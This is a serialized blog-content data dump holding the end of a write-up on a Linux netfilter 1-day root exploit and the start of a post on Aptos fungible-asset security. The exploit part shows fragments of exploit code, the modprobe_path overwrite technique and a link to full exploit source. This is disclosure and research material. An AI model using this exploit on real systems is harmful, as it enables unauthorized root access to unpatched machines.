perror",{"type":25,"tag":216,"props":64677,"children":64678},{"style":6964},[64679],{"type":31,"value":1850},{"type":25,"tag":216,"props":64681,"children":64682},{"style":8205},[64683],{"type":31,"value":64684},"\"[-] read(socket)\"",{"type":25,"tag":216,"props":64686,"children":64687},{"style":6964},[64688],{"type":31,"value":7797},{"type":25,"tag":216,"props":64690,"children":64691},{"class":6922,"line":27777},[64692,64697,64701,64705],{"type":25,"tag":216,"props":64693,"children":64694},{"style":6973},[64695],{"type":31,"value":64696},"                return",{"type":25,"tag":216,"props":64698,"children":64699},{"style":6953},[64700],{"type":31,"value":55224},{"type":25,"tag":216,"props":64702,"children":64703},{"style":6989},[64704],{"type":31,"value":184},{"type":25,"tag":216,"props":64706,"children":64707},{"style":6964},[64708],{"type":31,"value":6967},{"type":25,"tag":216,"props":64710,"children":64711},{"class":6922,"line":27790},[64712],{"type":25,"tag":216,"props":64713,"children":64714},{"style":6964},[64715],{"type":31,"value":62852},{"type":25,"tag":216,"props":64717,"children":64718},{"class":6922,"line":27803},[64719],{"type":25,"tag":216,"props":64720,"children":64721},{"style":6964},[64722],{"type":31,"value":7302},{"type":25,"tag":216,"props":64724,"children":64725},{"class":6922,"line":27816},[64726],{"type":25,"tag":216,"props":64727,"children":64728},{"style":6964},[64729],{"type":31,"value":7311},{"type":25,"tag":216,"props":64731,"children":64732},{"class":6922,"line":27870},[64733,64737,64741,64746],{"type":25,"tag":216,"props":64734,"children":64735},{"style":7047},[64736],{"type":31,"value":59475},{"type":25,"tag":216,"props":64738,"children":64739},{"style":6964},[64740],{"type":31,"value":1850},{"type":25,"tag":216,"props":64742,"children":64743},{"style":8205},[64744],{"type":31,"value":64745},"\"[-] fake modprobe failed\"",{"type":25,"tag":216,"props":64747,"children":64748},{"style":6964},[64749],{"type":31,"value":7797},{"type":25,"tag":216,"props":64751,"children":64752},{"class":6922,"line":27879},[64753],{"type":25,"tag":216,"props":64754,"children":64755},{"style":6964},[64756],{"type":31,"value":14275},{"type":25,"tag":38,"props":64758,"children":64759},{},[64760,64762,64769],{"type":31,"value":64761},"This trick has already been throughly detailed by ",{"type":25,"tag":162,"props":64763,"children":64766},{"href":64764,"rel":64765},"https://pwning.tech/nftables/#28-overwriting-modprobepath",[166],[64767],{"type":31,"value":64768},"lau",{"type":31,"value":64770},", so we won't go much more into it.",{"type":25,"tag":606,"props":64772,"children":64774},{"id":64773},"universal-exploit-demo",[64775],{"type":31,"value":64776},"Universal exploit demo",{"type":25,"tag":38,"props":64778,"children":64779},{},[64780,64782,64788],{"type":31,"value":64781},"{%youtube tjbp4Mtfo8w %}\nYou can find the complete universal exploit in our ",{"type":25,"tag":162,"props":64783,"children":64786},{"href":64784,"rel":64785},"https://github.com/otter-sec/OtterRoot/blob/master/universal/exploit.c",[166],[64787],{"type":31,"value":61383},{"type":31,"value":179},{"type":25,"tag":26,"props":64790,"children":64792},{"id":64791},"disclosure-timeline",[64793],{"type":31,"value":64794},"Disclosure Timeline",{"type":25,"tag":2039,"props":64796,"children":64797},{},[64798,64803,64808,64813,64818],{"type":25,"tag":2043,"props":64799,"children":64800},{},[64801],{"type":31,"value":64802},"March 21st -- Patch made public",{"type":25,"tag":2043,"props":64804,"children":64805},{},[64806],{"type":31,"value":64807},"March 23rd -- Scrolled through commits and found the bug fix.",{"type":25,"tag":2043,"props":64809,"children":64810},{},[64811],{"type":31,"value":64812},"March 24th -- Wrote KernelCTF exploit",{"type":25,"tag":2043,"props":64814,"children":64815},{},[64816],{"type":31,"value":64817},"March 26th -- Wrote Universal exploit",{"type":25,"tag":2043,"props":64819,"children":64820},{},[64821],{"type":31,"value":64822},"May 23rd -- Patch landed on Ubuntu and Debian",{"type":25,"tag":38,"props":64824,"children":64825},{},[64826],{"type":31,"value":64827},"Note that the universal exploit was alive for roughly 2 months against popular distros.",{"type":25,"tag":26,"props":64829,"children":64830},{"id":32892},[64831],{"type":31,"value":22907},{"type":25,"tag":38,"props":64833,"children":64834},{},[64835],{"type":31,"value":64836},"In this post, I have discussed how a bug fixed by a commit freshly made public can be used to exploit the latest stable releases of the kernel and maintain 0day-like primitives for an extended period. I've also discussed two different paths to exploit the vulnerability: one that I used to exploit the KernelCTF instance and retrieve the flag and a second one that I used to craft a universal exploit binary that works stably in all tested targets without needing to be adapted or even recompiled.",{"type":25,"tag":38,"props":64838,"children":64839},{},[64840],{"type":31,"value":64841},"What we have observed is not novel; despite the efforts and progress made by the Linux community to improve kernel security, it's been made evident that the supply of exploitable bugs is still virtually unlimited and that the open-source patch gap is long enough to maintain capabilities that are live.",{"type":25,"tag":9316,"props":64843,"children":64844},{},[64845],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":64847},[64848,64851,64854,64857,64858,64868,64876,64877],{"id":54536,"depth":6769,"text":54539,"children":64849},[64850],{"id":54557,"depth":6778,"text":54560},{"id":54600,"depth":6769,"text":54600,"children":64852},[64853],{"id":54647,"depth":6778,"text":54650},{"id":54705,"depth":6769,"text":54708,"children":64855},[64856],{"id":55867,"depth":6778,"text":55870},{"id":57742,"depth":6769,"text":57745},{"id":58144,"depth":6769,"text":58147,"children":64859},[64860,64861,64862,64864,64865,64866,64867],{"id":58171,"depth":6778,"text":58174},{"id":59053,"depth":6778,"text":59056},{"id":59639,"depth":6778,"text":64863},"Leaking self pointer of nft_object",{"id":60037,"depth":6778,"text":60040},{"id":60550,"depth":6778,"text":60553},{"id":60680,"depth":6778,"text":60338},{"id":61364,"depth":6778,"text":61367},{"id":61387,"depth":6769,"text":61390,"children":64869},[64870,64871,64872,64873,64875],{"id":61398,"depth":6778,"text":61401},{"id":62256,"depth":6778,"text":62259},{"id":62331,"depth":6778,"text":62334},{"id":63956,"depth":6778,"text":64874},"Overwriting modprobe_path",{"id":64773,"depth":6778,"text":64776},{"id":64791,"depth":6769,"text":64794},{"id":32892,"depth":6769,"text":22907},"content:blog:2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day",{"_path":64882,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":64883,"description":64884,"image":64885,"date":64887,"isFeatured":16,"onBlogPage":16,"tags":64888,"body":64889,"_type":6798,"_id":71607,"_source":6800,"_file":71608,"_stem":71609,"_extension":6803},"/blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets","Hitchhiker's Guide to Aptos Fungible Assets","We take a deep dive into Aptos’ implementation of fungible assets, exploring the intricacies hidden within its functions, objects, and interactions. While the Fungible Asset model was designed to address the limitations and security flaws of the legacy Coin standard, it also introduced new challenges and vulnerabilities that developers should be aware of.",{"src":64886,"width":9336,"height":9337},"/posts/aptos-guide/title.png","2025-02-10",[9831],{"type":22,"children":64890,"toc":71591},[64891,64904,64909,64918,64924,64952,65025,65065,65099,65260,65279,65360,65400,65428,65445,65450,65458,65463,65469,65490,65570,65603,65611,65624,65629,66013,66018,66023,66029,66034,66046,66150,66188,66191,66209,66517,66522,66534,66540,66566,66587,66592,66771,66791,66797,66817,66829,66834,66840,66852,66915,66942,66966,67187,67190,67209,67319,67376,67512,67539,67545,67571,67815,67843,68145,68178,68192,68218,68251,68558,68570,68847,68861,69178,69197,69203,69235,69275,69376,69396,69516,69533,69607,69619,69707,69728,69734,69739,69744,69761,69782,70153,70212,70217,70668,70673,70709,70715,70727,70749,70775,70982,70996,71251,71263,71290,71441,71460,71490,71494,71505,71510,71523,71587],{"type":25,"tag":38,"props":64892,"children":64893},{},[64894,64896,64902],{"type":31,"value":64895},"Aptos’ fungible asset model is a complex component of its ecosystem, designed to address the limitations of its predecessor — the ",{"type":25,"tag":82,"props":64897,"children":64899},{"className":64898},[],[64900],{"type":31,"value":64901},"coin",{"type":31,"value":64903}," standard. While the new model aims to enhance functionality and security, it also comes with its own set of challenges.",{"type":25,"tag":38,"props":64905,"children":64906},{},[64907],{"type":31,"value":64908},"In this blog post, we'll closely examine Aptos's coin and fungible asset models, exploring their history and connection. We will examine key aspects of the fungible asset framework, including real-world examples of vulnerabilities that were identified and addressed, with the goal of improving security and reliability — all to help you build more secure and reliable applications.",{"type":25,"tag":64910,"props":64911,"children":64912},"important",{},[64913],{"type":25,"tag":38,"props":64914,"children":64915},{},[64916],{"type":31,"value":64917},"All issues mentioned were identified and addressed during Aptos' rigorous pre-release audits, demonstrating the project's dedication to delivering a robust and secure environment from day one.",{"type":25,"tag":26,"props":64919,"children":64921},{"id":64920},"aptos-coin-standard",[64922],{"type":31,"value":64923},"Aptos Coin standard",{"type":25,"tag":38,"props":64925,"children":64926},{},[64927,64929,64935,64937,64942,64943,64950],{"type":31,"value":64928},"In the beginning, Aptos used ",{"type":25,"tag":82,"props":64930,"children":64932},{"className":64931},[],[64933],{"type":31,"value":64934},"Coin",{"type":31,"value":64936},". It is still in use, although it is now considered \"legacy\". ",{"type":25,"tag":82,"props":64938,"children":64940},{"className":64939},[],[64941],{"type":31,"value":64934},{"type":31,"value":1680},{"type":25,"tag":162,"props":64944,"children":64947},{"href":64945,"rel":64946},"https://github.com/aptos-labs/aptos-core/blob/1381c93fd5a656f16fb326d4ffe371947554a330/aptos-move/framework/aptos-framework/sources/coin.move#L119-L123",[166],[64948],{"type":31,"value":64949},"defined",{"type":31,"value":64951}," in Aptos as follows:",{"type":25,"tag":206,"props":64953,"children":64955},{"className":6915,"code":64954,"language":6914,"meta":7,"style":7},"struct Coin\u003Cphantom CoinType> has store {\n    value: u64,\n}\n",[64956],{"type":25,"tag":82,"props":64957,"children":64958},{"__ignoreMap":7},[64959,64998,65018],{"type":25,"tag":216,"props":64960,"children":64961},{"class":6922,"line":6923},[64962,64966,64970,64974,64978,64982,64986,64990,64994],{"type":25,"tag":216,"props":64963,"children":64964},{"style":6936},[64965],{"type":31,"value":13357},{"type":25,"tag":216,"props":64967,"children":64968},{"style":7375},[64969],{"type":31,"value":9752},{"type":25,"tag":216,"props":64971,"children":64972},{"style":6964},[64973],{"type":31,"value":9757},{"type":25,"tag":216,"props":64975,"children":64976},{"style":6947},[64977],{"type":31,"value":9762},{"type":25,"tag":216,"props":64979,"children":64980},{"style":7375},[64981],{"type":31,"value":9767},{"type":25,"tag":216,"props":64983,"children":64984},{"style":6964},[64985],{"type":31,"value":9772},{"type":25,"tag":216,"props":64987,"children":64988},{"style":6947},[64989],{"type":31,"value":9777},{"type":25,"tag":216,"props":64991,"children":64992},{"style":6947},[64993],{"type":31,"value":9782},{"type":25,"tag":216,"props":64995,"children":64996},{"style":6964},[64997],{"type":31,"value":7241},{"type":25,"tag":216,"props":64999,"children":65000},{"class":6922,"line":6769},[65001,65006,65010,65014],{"type":25,"tag":216,"props":65002,"children":65003},{"style":6947},[65004],{"type":31,"value":65005},"    value",{"type":25,"tag":216,"props":65007,"children":65008},{"style":6953},[65009],{"type":31,"value":1472},{"type":25,"tag":216,"props":65011,"children":65012},{"style":7375},[65013],{"type":31,"value":9811},{"type":25,"tag":216,"props":65015,"children":65016},{"style":6964},[65017],{"type":31,"value":7465},{"type":25,"tag":216,"props":65019,"children":65020},{"class":6922,"line":6778},[65021],{"type":25,"tag":216,"props":65022,"children":65023},{"style":6964},[65024],{"type":31,"value":7874},{"type":25,"tag":38,"props":65026,"children":65027},{},[65028,65030,65035,65037,65043,65044,65050,65052,65057,65059,65064],{"type":31,"value":65029},"Aptos distinguishes coins by their type (",{"type":25,"tag":82,"props":65031,"children":65033},{"className":65032},[],[65034],{"type":31,"value":10535},{"type":31,"value":65036},") at compile time. For example, ",{"type":25,"tag":82,"props":65038,"children":65040},{"className":65039},[],[65041],{"type":31,"value":65042},"Coin\u003COtter>",{"type":31,"value":1307},{"type":25,"tag":82,"props":65045,"children":65047},{"className":65046},[],[65048],{"type":31,"value":65049},"Coin\u003CWeasel>",{"type":31,"value":65051}," represent different coins, and you cannot pass a ",{"type":25,"tag":82,"props":65053,"children":65055},{"className":65054},[],[65056],{"type":31,"value":65049},{"type":31,"value":65058}," to a function expecting ",{"type":25,"tag":82,"props":65060,"children":65062},{"className":65061},[],[65063],{"type":31,"value":65042},{"type":31,"value":179},{"type":25,"tag":38,"props":65066,"children":65067},{},[65068,65070,65075,65077,65082,65084,65089,65091,65097],{"type":31,"value":65069},"The type signature reveals why ",{"type":25,"tag":82,"props":65071,"children":65073},{"className":65072},[],[65074],{"type":31,"value":64934},{"type":31,"value":65076}," has become a legacy standard. ",{"type":25,"tag":82,"props":65078,"children":65080},{"className":65079},[],[65081],{"type":31,"value":64934},{"type":31,"value":65083}," has only the ",{"type":25,"tag":82,"props":65085,"children":65087},{"className":65086},[],[65088],{"type":31,"value":9892},{"type":31,"value":65090}," ability and uses a ",{"type":25,"tag":82,"props":65092,"children":65094},{"className":65093},[],[65095],{"type":31,"value":65096},"CoinStore",{"type":31,"value":65098}," wrapper to store the coin and metadata:",{"type":25,"tag":206,"props":65100,"children":65102},{"className":6915,"code":65101,"language":6914,"meta":7,"style":7},"struct CoinStore\u003Cphantom CoinType> has key {\n    coin: Coin\u003CCoinType>,\n    frozen: bool,\n    deposit_events: EventHandle\u003CDepositEvent>,\n    withdraw_events: EventHandle\u003CWithdrawEvent>,\n}\n",[65103],{"type":25,"tag":82,"props":65104,"children":65105},{"__ignoreMap":7},[65106,65146,65174,65194,65224,65253],{"type":25,"tag":216,"props":65107,"children":65108},{"class":6922,"line":6923},[65109,65113,65118,65122,65126,65130,65134,65138,65142],{"type":25,"tag":216,"props":65110,"children":65111},{"style":6936},[65112],{"type":31,"value":13357},{"type":25,"tag":216,"props":65114,"children":65115},{"style":7375},[65116],{"type":31,"value":65117}," CoinStore",{"type":25,"tag":216,"props":65119,"children":65120},{"style":6964},[65121],{"type":31,"value":9757},{"type":25,"tag":216,"props":65123,"children":65124},{"style":6947},[65125],{"type":31,"value":9762},{"type":25,"tag":216,"props":65127,"children":65128},{"style":7375},[65129],{"type":31,"value":9767},{"type":25,"tag":216,"props":65131,"children":65132},{"style":6964},[65133],{"type":31,"value":9772},{"type":25,"tag":216,"props":65135,"children":65136},{"style":6947},[65137],{"type":31,"value":9777},{"type":25,"tag":216,"props":65139,"children":65140},{"style":6947},[65141],{"type":31,"value":9883},{"type":25,"tag":216,"props":65143,"children":65144},{"style":6964},[65145],{"type":31,"value":7241},{"type":25,"tag":216,"props":65147,"children":65148},{"class":6922,"line":6769},[65149,65154,65158,65162,65166,65170],{"type":25,"tag":216,"props":65150,"children":65151},{"style":6947},[65152],{"type":31,"value":65153},"    coin",{"type":25,"tag":216,"props":65155,"children":65156},{"style":6953},[65157],{"type":31,"value":1472},{"type":25,"tag":216,"props":65159,"children":65160},{"style":7375},[65161],{"type":31,"value":9752},{"type":25,"tag":216,"props":65163,"children":65164},{"style":6964},[65165],{"type":31,"value":9757},{"type":25,"tag":216,"props":65167,"children":65168},{"style":7375},[65169],{"type":31,"value":10535},{"type":25,"tag":216,"props":65171,"children":65172},{"style":6964},[65173],{"type":31,"value":10089},{"type":25,"tag":216,"props":65175,"children":65176},{"class":6922,"line":6778},[65177,65182,65186,65190],{"type":25,"tag":216,"props":65178,"children":65179},{"style":6947},[65180],{"type":31,"value":65181},"    frozen",{"type":25,"tag":216,"props":65183,"children":65184},{"style":6953},[65185],{"type":31,"value":1472},{"type":25,"tag":216,"props":65187,"children":65188},{"style":7375},[65189],{"type":31,"value":16006},{"type":25,"tag":216,"props":65191,"children":65192},{"style":6964},[65193],{"type":31,"value":7465},{"type":25,"tag":216,"props":65195,"children":65196},{"class":6922,"line":7005},[65197,65202,65206,65211,65215,65220],{"type":25,"tag":216,"props":65198,"children":65199},{"style":6947},[65200],{"type":31,"value":65201},"    deposit_events",{"type":25,"tag":216,"props":65203,"children":65204},{"style":6953},[65205],{"type":31,"value":1472},{"type":25,"tag":216,"props":65207,"children":65208},{"style":7375},[65209],{"type":31,"value":65210}," EventHandle",{"type":25,"tag":216,"props":65212,"children":65213},{"style":6964},[65214],{"type":31,"value":9757},{"type":25,"tag":216,"props":65216,"children":65217},{"style":7375},[65218],{"type":31,"value":65219},"DepositEvent",{"type":25,"tag":216,"props":65221,"children":65222},{"style":6964},[65223],{"type":31,"value":10089},{"type":25,"tag":216,"props":65225,"children":65226},{"class":6922,"line":7110},[65227,65232,65236,65240,65244,65249],{"type":25,"tag":216,"props":65228,"children":65229},{"style":6947},[65230],{"type":31,"value":65231},"    withdraw_events",{"type":25,"tag":216,"props":65233,"children":65234},{"style":6953},[65235],{"type":31,"value":1472},{"type":25,"tag":216,"props":65237,"children":65238},{"style":7375},[65239],{"type":31,"value":65210},{"type":25,"tag":216,"props":65241,"children":65242},{"style":6964},[65243],{"type":31,"value":9757},{"type":25,"tag":216,"props":65245,"children":65246},{"style":7375},[65247],{"type":31,"value":65248},"WithdrawEvent",{"type":25,"tag":216,"props":65250,"children":65251},{"style":6964},[65252],{"type":31,"value":10089},{"type":25,"tag":216,"props":65254,"children":65255},{"class":6922,"line":7216},[65256],{"type":25,"tag":216,"props":65257,"children":65258},{"style":6964},[65259],{"type":31,"value":7874},{"type":25,"tag":38,"props":65261,"children":65262},{},[65263,65265,65270,65272,65277],{"type":31,"value":65264},"However, an astute reader would note that this isn't the only place a ",{"type":25,"tag":82,"props":65266,"children":65268},{"className":65267},[],[65269],{"type":31,"value":64934},{"type":31,"value":65271}," can be stored. You can create your own ",{"type":25,"tag":82,"props":65273,"children":65275},{"className":65274},[],[65276],{"type":31,"value":64934},{"type":31,"value":65278}," wallet, which could look like this:",{"type":25,"tag":206,"props":65280,"children":65282},{"className":6915,"code":65281,"language":6914,"meta":7,"style":7},"struct DefinitelyLegitCoinStore\u003Cphantom CoinType> has key {\n    coin: Coin\u003CCoinType>\n}\n",[65283],{"type":25,"tag":82,"props":65284,"children":65285},{"__ignoreMap":7},[65286,65326,65353],{"type":25,"tag":216,"props":65287,"children":65288},{"class":6922,"line":6923},[65289,65293,65298,65302,65306,65310,65314,65318,65322],{"type":25,"tag":216,"props":65290,"children":65291},{"style":6936},[65292],{"type":31,"value":13357},{"type":25,"tag":216,"props":65294,"children":65295},{"style":7375},[65296],{"type":31,"value":65297}," DefinitelyLegitCoinStore",{"type":25,"tag":216,"props":65299,"children":65300},{"style":6964},[65301],{"type":31,"value":9757},{"type":25,"tag":216,"props":65303,"children":65304},{"style":6947},[65305],{"type":31,"value":9762},{"type":25,"tag":216,"props":65307,"children":65308},{"style":7375},[65309],{"type":31,"value":9767},{"type":25,"tag":216,"props":65311,"children":65312},{"style":6964},[65313],{"type":31,"value":9772},{"type":25,"tag":216,"props":65315,"children":65316},{"style":6947},[65317],{"type":31,"value":9777},{"type":25,"tag":216,"props":65319,"children":65320},{"style":6947},[65321],{"type":31,"value":9883},{"type":25,"tag":216,"props":65323,"children":65324},{"style":6964},[65325],{"type":31,"value":7241},{"type":25,"tag":216,"props":65327,"children":65328},{"class":6922,"line":6769},[65329,65333,65337,65341,65345,65349],{"type":25,"tag":216,"props":65330,"children":65331},{"style":6947},[65332],{"type":31,"value":65153},{"type":25,"tag":216,"props":65334,"children":65335},{"style":6953},[65336],{"type":31,"value":1472},{"type":25,"tag":216,"props":65338,"children":65339},{"style":7375},[65340],{"type":31,"value":9752},{"type":25,"tag":216,"props":65342,"children":65343},{"style":6964},[65344],{"type":31,"value":9757},{"type":25,"tag":216,"props":65346,"children":65347},{"style":7375},[65348],{"type":31,"value":10535},{"type":25,"tag":216,"props":65350,"children":65351},{"style":6964},[65352],{"type":31,"value":9943},{"type":25,"tag":216,"props":65354,"children":65355},{"class":6922,"line":6778},[65356],{"type":25,"tag":216,"props":65357,"children":65358},{"style":6964},[65359],{"type":31,"value":7874},{"type":25,"tag":38,"props":65361,"children":65362},{},[65363,65368,65370,65376,65378,65383,65385,65391,65393,65398],{"type":25,"tag":82,"props":65364,"children":65366},{"className":65365},[],[65367],{"type":31,"value":65096},{"type":31,"value":65369}," includes a ",{"type":25,"tag":82,"props":65371,"children":65373},{"className":65372},[],[65374],{"type":31,"value":65375},"frozen",{"type":31,"value":65377}," field, allowing the issuer to block transfers to and from the store. ",{"type":25,"tag":82,"props":65379,"children":65381},{"className":65380},[],[65382],{"type":31,"value":65096},{"type":31,"value":65384}," is also required for a ",{"type":25,"tag":82,"props":65386,"children":65388},{"className":65387},[],[65389],{"type":31,"value":65390},"burn_from",{"type":31,"value":65392}," operation, which withdraws the ",{"type":25,"tag":82,"props":65394,"children":65396},{"className":65395},[],[65397],{"type":31,"value":64901},{"type":31,"value":65399}," from the store and destroys it. Freezing and burning operations are essential i.e. for stablecoin issuers, using them as compliance tools to prevent unauthorized or illegal transactions and adhere to legal orders. Being able to bypass these restrictions with a custom wallet is an issue and can lead to severe consequences.",{"type":25,"tag":38,"props":65401,"children":65402},{},[65403,65405,65410,65412,65419,65421,65426],{"type":31,"value":65404},"Storing ",{"type":25,"tag":82,"props":65406,"children":65408},{"className":65407},[],[65409],{"type":31,"value":64901},{"type":31,"value":65411}," in a custom wallet is also a problem in terms of off-chain observability, as finding the stored coins in such setup is a difficult task. This is how the fungible asset ",{"type":25,"tag":162,"props":65413,"children":65416},{"href":65414,"rel":65415},"https://github.com/aptos-foundation/AIPs/blob/ac3da48db226cf2dbaf4df6f1f5109a4f1b2e604/aips/aip-21.md",[166],[65417],{"type":31,"value":65418},"AIP-21",{"type":31,"value":65420}," summarizes the ",{"type":25,"tag":82,"props":65422,"children":65424},{"className":65423},[],[65425],{"type":31,"value":64901},{"type":31,"value":65427}," problems:",{"type":25,"tag":34,"props":65429,"children":65430},{},[65431,65440],{"type":25,"tag":38,"props":65432,"children":65433},{},[65434,65438],{"type":25,"tag":216,"props":65435,"children":65436},{},[65437],{"type":31,"value":13547},{"type":31,"value":65439}," coin module has been deemed insufficient for current and future needs due to the rigidity of Move structs and the inherently poor extensibility.",{"type":25,"tag":38,"props":65441,"children":65442},{},[65443],{"type":31,"value":65444},"The existing Coin struct leverages the store ability allowing for assets on-chain to become untraceable. Creating challenges to off-chain observability and on-chain management, such as freezing or burning.",{"type":25,"tag":38,"props":65446,"children":65447},{},[65448],{"type":31,"value":65449},"And declares, that:",{"type":25,"tag":34,"props":65451,"children":65452},{},[65453],{"type":25,"tag":38,"props":65454,"children":65455},{},[65456],{"type":31,"value":65457},"Fungible assets addresses these issues.",{"type":25,"tag":38,"props":65459,"children":65460},{},[65461],{"type":31,"value":65462},"Let's find out whether this is indeed the case.",{"type":25,"tag":26,"props":65464,"children":65466},{"id":65465},"the-fungible-assets",[65467],{"type":31,"value":65468},"The fungible assets",{"type":25,"tag":38,"props":65470,"children":65471},{},[65472,65474,65480,65482,65489],{"type":31,"value":65473},"Aptos designed fungible assets as a new token standard to solve these problems. A ",{"type":25,"tag":82,"props":65475,"children":65477},{"className":65476},[],[65478],{"type":31,"value":65479},"FungibleAsset",{"type":31,"value":65481}," uses the ",{"type":25,"tag":162,"props":65483,"children":65486},{"href":65484,"rel":65485},"https://medium.com/@borispovod/move-hot-potato-pattern-bbc48a48d93c",[166],[65487],{"type":31,"value":65488},"hot-potato pattern",{"type":31,"value":1472},{"type":25,"tag":206,"props":65491,"children":65493},{"className":6915,"code":65492,"language":6914,"meta":7,"style":7},"struct FungibleAsset {\n    metadata: Object\u003CMetadata>,\n    amount: u64,\n}\n",[65494],{"type":25,"tag":82,"props":65495,"children":65496},{"__ignoreMap":7},[65497,65513,65543,65563],{"type":25,"tag":216,"props":65498,"children":65499},{"class":6922,"line":6923},[65500,65504,65509],{"type":25,"tag":216,"props":65501,"children":65502},{"style":6936},[65503],{"type":31,"value":13357},{"type":25,"tag":216,"props":65505,"children":65506},{"style":7375},[65507],{"type":31,"value":65508}," FungibleAsset",{"type":25,"tag":216,"props":65510,"children":65511},{"style":6964},[65512],{"type":31,"value":7241},{"type":25,"tag":216,"props":65514,"children":65515},{"class":6922,"line":6769},[65516,65521,65525,65530,65534,65539],{"type":25,"tag":216,"props":65517,"children":65518},{"style":6947},[65519],{"type":31,"value":65520},"    metadata",{"type":25,"tag":216,"props":65522,"children":65523},{"style":6953},[65524],{"type":31,"value":1472},{"type":25,"tag":216,"props":65526,"children":65527},{"style":7375},[65528],{"type":31,"value":65529}," Object",{"type":25,"tag":216,"props":65531,"children":65532},{"style":6964},[65533],{"type":31,"value":9757},{"type":25,"tag":216,"props":65535,"children":65536},{"style":7375},[65537],{"type":31,"value":65538},"Metadata",{"type":25,"tag":216,"props":65540,"children":65541},{"style":6964},[65542],{"type":31,"value":10089},{"type":25,"tag":216,"props":65544,"children":65545},{"class":6922,"line":6778},[65546,65551,65555,65559],{"type":25,"tag":216,"props":65547,"children":65548},{"style":6947},[65549],{"type":31,"value":65550},"    amount",{"type":25,"tag":216,"props":65552,"children":65553},{"style":6953},[65554],{"type":31,"value":1472},{"type":25,"tag":216,"props":65556,"children":65557},{"style":7375},[65558],{"type":31,"value":9811},{"type":25,"tag":216,"props":65560,"children":65561},{"style":6964},[65562],{"type":31,"value":7465},{"type":25,"tag":216,"props":65564,"children":65565},{"class":6922,"line":7005},[65566],{"type":25,"tag":216,"props":65567,"children":65568},{"style":6964},[65569],{"type":31,"value":7874},{"type":25,"tag":38,"props":65571,"children":65572},{},[65573,65575,65580,65581,65586,65588,65593,65595,65602],{"type":31,"value":65574},"Unlike ",{"type":25,"tag":82,"props":65576,"children":65578},{"className":65577},[],[65579],{"type":31,"value":64934},{"type":31,"value":7026},{"type":25,"tag":82,"props":65582,"children":65584},{"className":65583},[],[65585],{"type":31,"value":65479},{"type":31,"value":65587}," types are defined at runtime through the ",{"type":25,"tag":82,"props":65589,"children":65591},{"className":65590},[],[65592],{"type":31,"value":65538},{"type":31,"value":65594}," field. This change was meant to ",{"type":25,"tag":162,"props":65596,"children":65599},{"href":65597,"rel":65598},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-21.md#specification",[166],[65600],{"type":31,"value":65601},"enhance extensibility",{"type":31,"value":1472},{"type":25,"tag":34,"props":65604,"children":65605},{},[65606],{"type":25,"tag":38,"props":65607,"children":65608},{},[65609],{"type":31,"value":65610},"An object can have other resources attached to provide additional context. For example, the metadata could define a gem of a given type, color, quality, and rarity, where ownership indicates the quantity or total weight owned of that type of gem.",{"type":25,"tag":38,"props":65612,"children":65613},{},[65614,65616,65622],{"type":31,"value":65615},"An important implication is that functions accepting ",{"type":25,"tag":82,"props":65617,"children":65619},{"className":65618},[],[65620],{"type":31,"value":65621},"FungibleAssets",{"type":31,"value":65623}," must verify the metadata to ensure valid assets.",{"type":25,"tag":38,"props":65625,"children":65626},{},[65627],{"type":31,"value":65628},"Let's consider a possible implementation of a protocol that takes in assets.",{"type":25,"tag":206,"props":65630,"children":65632},{"className":6915,"code":65631,"language":6914,"meta":7,"style":7},"public fun deposit\u003CT: key>(\n    sender: &signer, fa: FungibleAsset\n) acquires [...] {\n    assert_not_paused();\n    \n    let fa_amount = fungible_asset::amount(&fa);\n    let sender_address = address_of(sender);\n    check_compliance(fa_amount, sender_address);\n    \n    increase_deposit(get_vault(sender_address), fa_amount);\n    \n    primary_fungible_store::deposit(global_vault_address(), fa);\n    \n    event::emit(Deposit {sender_address, fa_amount})\n}\n",[65633],{"type":25,"tag":82,"props":65634,"children":65635},{"__ignoreMap":7},[65636,65673,65711,65735,65747,65755,65800,65834,65864,65871,65908,65915,65953,65960,66006],{"type":25,"tag":216,"props":65637,"children":65638},{"class":6922,"line":6923},[65639,65644,65648,65653,65657,65661,65665,65669],{"type":25,"tag":216,"props":65640,"children":65641},{"style":6947},[65642],{"type":31,"value":65643},"public",{"type":25,"tag":216,"props":65645,"children":65646},{"style":6947},[65647],{"type":31,"value":10158},{"type":25,"tag":216,"props":65649,"children":65650},{"style":6947},[65651],{"type":31,"value":65652}," deposit",{"type":25,"tag":216,"props":65654,"children":65655},{"style":6964},[65656],{"type":31,"value":9757},{"type":25,"tag":216,"props":65658,"children":65659},{"style":7375},[65660],{"type":31,"value":177},{"type":25,"tag":216,"props":65662,"children":65663},{"style":6953},[65664],{"type":31,"value":1472},{"type":25,"tag":216,"props":65666,"children":65667},{"style":6947},[65668],{"type":31,"value":9883},{"type":25,"tag":216,"props":65670,"children":65671},{"style":6964},[65672],{"type":31,"value":10540},{"type":25,"tag":216,"props":65674,"children":65675},{"class":6922,"line":6769},[65676,65681,65685,65689,65693,65697,65702,65706],{"type":25,"tag":216,"props":65677,"children":65678},{"style":6947},[65679],{"type":31,"value":65680},"    sender",{"type":25,"tag":216,"props":65682,"children":65683},{"style":6953},[65684],{"type":31,"value":1472},{"type":25,"tag":216,"props":65686,"children":65687},{"style":6953},[65688],{"type":31,"value":11093},{"type":25,"tag":216,"props":65690,"children":65691},{"style":6947},[65692],{"type":31,"value":11098},{"type":25,"tag":216,"props":65694,"children":65695},{"style":6964},[65696],{"type":31,"value":7026},{"type":25,"tag":216,"props":65698,"children":65699},{"style":6947},[65700],{"type":31,"value":65701},"fa",{"type":25,"tag":216,"props":65703,"children":65704},{"style":6953},[65705],{"type":31,"value":1472},{"type":25,"tag":216,"props":65707,"children":65708},{"style":7375},[65709],{"type":31,"value":65710}," FungibleAsset\n",{"type":25,"tag":216,"props":65712,"children":65713},{"class":6922,"line":6778},[65714,65718,65722,65726,65730],{"type":25,"tag":216,"props":65715,"children":65716},{"style":6964},[65717],{"type":31,"value":7036},{"type":25,"tag":216,"props":65719,"children":65720},{"style":6947},[65721],{"type":31,"value":10295},{"type":25,"tag":216,"props":65723,"children":65724},{"style":6964},[65725],{"type":31,"value":26978},{"type":25,"tag":216,"props":65727,"children":65728},{"style":6953},[65729],{"type":31,"value":13547},{"type":25,"tag":216,"props":65731,"children":65732},{"style":6964},[65733],{"type":31,"value":65734},"] 